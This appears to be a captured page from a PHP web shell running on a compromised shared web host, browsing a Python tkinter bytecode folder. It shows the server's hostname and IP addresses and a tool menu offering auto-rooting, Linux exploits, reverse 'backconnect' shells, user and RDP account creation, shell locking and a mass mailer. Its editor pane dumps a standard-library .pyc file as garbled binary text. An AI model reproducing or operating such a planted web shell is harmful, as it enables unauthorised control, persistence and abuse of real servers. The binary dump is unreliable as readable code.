Linux premium134.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.104 | : 216.73.217.117
Cant Read [ /etc/named.conf ]
?8.1.34
mfbsrygq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
lib64 /
python3.12 /
tkinter /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-312.opt-1.pyc
239.93
KB
-rw-r--r--
__init__.cpython-312.opt-2.pyc
173.24
KB
-rw-r--r--
__init__.cpython-312.pyc
240.07
KB
-rw-r--r--
__main__.cpython-312.opt-1.pyc
424
B
-rw-r--r--
__main__.cpython-312.opt-2.pyc
395
B
-rw-r--r--
__main__.cpython-312.pyc
424
B
-rw-r--r--
colorchooser.cpython-312.opt-1...
2.69
KB
-rw-r--r--
colorchooser.cpython-312.opt-2...
1.58
KB
-rw-r--r--
colorchooser.cpython-312.pyc
2.69
KB
-rw-r--r--
commondialog.cpython-312.opt-1...
1.85
KB
-rw-r--r--
commondialog.cpython-312.opt-2...
1.85
KB
-rw-r--r--
commondialog.cpython-312.pyc
1.85
KB
-rw-r--r--
constants.cpython-312.opt-1.py...
1.89
KB
-rw-r--r--
constants.cpython-312.opt-2.py...
1.89
KB
-rw-r--r--
constants.cpython-312.pyc
1.89
KB
-rw-r--r--
dialog.cpython-312.opt-1.pyc
2.06
KB
-rw-r--r--
dialog.cpython-312.opt-2.pyc
2.06
KB
-rw-r--r--
dialog.cpython-312.pyc
2.06
KB
-rw-r--r--
dnd.cpython-312.opt-1.pyc
15.94
KB
-rw-r--r--
dnd.cpython-312.opt-2.pyc
11.11
KB
-rw-r--r--
dnd.cpython-312.pyc
15.94
KB
-rw-r--r--
filedialog.cpython-312.opt-1.p...
22.09
KB
-rw-r--r--
filedialog.cpython-312.opt-2.p...
20.34
KB
-rw-r--r--
filedialog.cpython-312.pyc
22.09
KB
-rw-r--r--
font.cpython-312.opt-1.pyc
10.62
KB
-rw-r--r--
font.cpython-312.opt-2.pyc
9.52
KB
-rw-r--r--
font.cpython-312.pyc
10.62
KB
-rw-r--r--
messagebox.cpython-312.opt-1.p...
4.01
KB
-rw-r--r--
messagebox.cpython-312.opt-2.p...
3.71
KB
-rw-r--r--
messagebox.cpython-312.pyc
4.01
KB
-rw-r--r--
scrolledtext.cpython-312.opt-1...
3.25
KB
-rw-r--r--
scrolledtext.cpython-312.opt-2...
2.71
KB
-rw-r--r--
scrolledtext.cpython-312.pyc
3.25
KB
-rw-r--r--
simpledialog.cpython-312.opt-1...
17.13
KB
-rw-r--r--
simpledialog.cpython-312.opt-2...
15.51
KB
-rw-r--r--
simpledialog.cpython-312.pyc
17.13
KB
-rw-r--r--
tix.cpython-312.opt-1.pyc
109.16
KB
-rw-r--r--
tix.cpython-312.opt-2.pyc
88.85
KB
-rw-r--r--
tix.cpython-312.pyc
109.16
KB
-rw-r--r--
ttk.cpython-312.opt-1.pyc
71.89
KB
-rw-r--r--
ttk.cpython-312.opt-2.pyc
44.99
KB
-rw-r--r--
ttk.cpython-312.pyc
71.89
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : filedialog.cpython-312.pyc
� �֦i[: � � � d Z g d�ZddlZddlZddlmZmZmZmZm Z m Z mZmZm Z mZmZmZmZmZmZmZ ddlmZ ddlmZ ddlmZ i Z G d� d � Z G d � de� Z G d� d e� Z G d� dej, � Z G d� de� Z G d� de� Z G d� dej, � Z!d� Z"d� Z#d� Z$dd�Z%dd�Z&d d�Z'd� Z(d� Z)e*dk( r e)� yy)!aU File selection dialog classes. Classes: - FileDialog - LoadFileDialog - SaveFileDialog This module also presents tk common file dialogues, it provides interfaces to the native file dialogues available in Tk 4.2 and newer, and the directory dialogue available in Tk 8.3 and newer. These interfaces were written by Fredrik Lundh, May 1997. ) � FileDialog�LoadFileDialog�SaveFileDialog�Open�SaveAs� Directory�askopenfilename�asksaveasfilename�askopenfilenames�askopenfile�askopenfiles� asksaveasfile�askdirectory� N)�Frame�LEFT�YES�BOTTOM�Entry�TOP�Button�Tk�X�Toplevel�RIGHT�Y�END�Listbox�BOTH� Scrollbar)�Dialog)�commondialog)� _setup_dialogc � � e Zd ZdZdZdd�Zej dddfd�Zdd�Z d � Z d � Zd� Zd� Z d � Zd� Zdd�Zd� Zd� Zdd�Zd� Zd� Zy)r a� Standard file selection dialog -- no checks on selected file. Usage: d = FileDialog(master) fname = d.go(dir_or_file, pattern, default, key) if fname is None: ...canceled... else: ...open file... All arguments to go() are optional. The 'key' argument specifies a key in the global dictionary 'dialogstates', which keeps track of the values for the directory and pattern arguments, overriding the values passed in (it does not keep track of the default argument!). If no key is specified, the dialog keeps no memory of previous state. Note that memory is kept even when the dialog is canceled. (All this emulates the behavior of the Macintosh file selection dialogs.) zFile Selection DialogNc �* � |�| j }|| _ d | _ t |� | _ | j j |� | j j |� t | j � t | j � | _ | j j t t �� t | j � | _ | j j t t �� | j j d| j � t | j � | _ | j j t"